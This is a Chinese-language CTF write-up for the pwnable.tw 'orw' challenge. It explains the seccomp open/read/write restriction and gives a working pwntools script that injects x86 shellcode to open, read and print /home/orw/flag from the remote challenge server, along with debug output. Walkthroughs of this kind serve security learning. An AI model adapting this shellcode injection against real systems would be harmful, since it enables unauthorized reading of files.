Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.
nc chall.pwnable.tw 10001
这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write
从ida看源代码
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}
其中orw_seccomp就是syscall的过滤,相当于一个白名单,可以参考一下https://blog.csdn.net/bai___ddd/article/details/79105754
接下来就是读入我们的shellcode,然后执行shellcode了。
大体上可以构造一个
sys_open(filename="/home/orw/flag")
sys_read(fd=3,count=0x30)
sys_write(fd=1,count=0x30)
当打开一个新的文件时,文件描述符会在系统原有的0、1、2之上增加,POSIX标准要求每次打开文件时必须使用当前进程中最小可用的文件描述符,所以read在写入的时候调用的就是fd=3。
关于文件描述符可参考https://blog.csdn.net/qq_35733751/article/details/80699521
之后就可以构造shellcode了
from pwn import *
filename="push 0x6761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f"#/home/orw/flag的16进制
sys_open=";mov eax,0x5;mov ebx,esp;int 0x80;"#eax为5时,int80调用open,ebx是读取filename时栈内的起始位置
sys_read="mov eax,0x3;mov ebx,0x3;mov edx,0x30;int 0x80;"#eax为3时,int80调用read,ebx的值就是fd的值,edx则是count的值
sys_write="mov eax,0x4;mov ebx,0x1;mov edx,0x30;int 0x80;"
shellcode=filename+sys_open+sys_read+sys_write
payload=asm(shellcode)
s=remote('chall.pwnable.tw',10001)
s.recv(1024)
s.sendline(payload)
print s.recv()
s.interactive()
这道题主要就是让人了解shellcode的编写,参考了https://www.anquanke.com/post/id/150359
另外关于linux下syscall如何调用寄存器可以浏览Linux Syscall Reference
sys_open的mode参数只有在创建新文件的时候才有用edx随便设什么值都可以,不设也没关系。(但是关于ecx即flag值的设置却让我困惑了,我的shellcode设置了ecx反而会出错,可能是因为我要push ecx的话,栈内的0x6761和ecx之间有间隔,因为push 0x6761其实相当于push 0x00006761,这点可以在debug模式中看到自己发送的数据从而验证
[DEBUG] Sent 0x45 bytes:
00000000 68 61 67 00 00 68 77 2f 66 6c 68 65 2f 6f 72 68 │hag·│·hw/│flhe│/orh│
开启debug模式就是在python程序第二行加context.log_level="debug",目前我还无法确定原因)。
关于sys_open源码详解可以参考https://blog.csdn.net/npy_lp/article/details/78572821和https://blog.csdn.net/sanwenyublog/article/details/50880528
sys_read和sys_write详解可以参考https://blog.csdn.net/npy_lp/article/details/78684531?locationNum=8&fps=1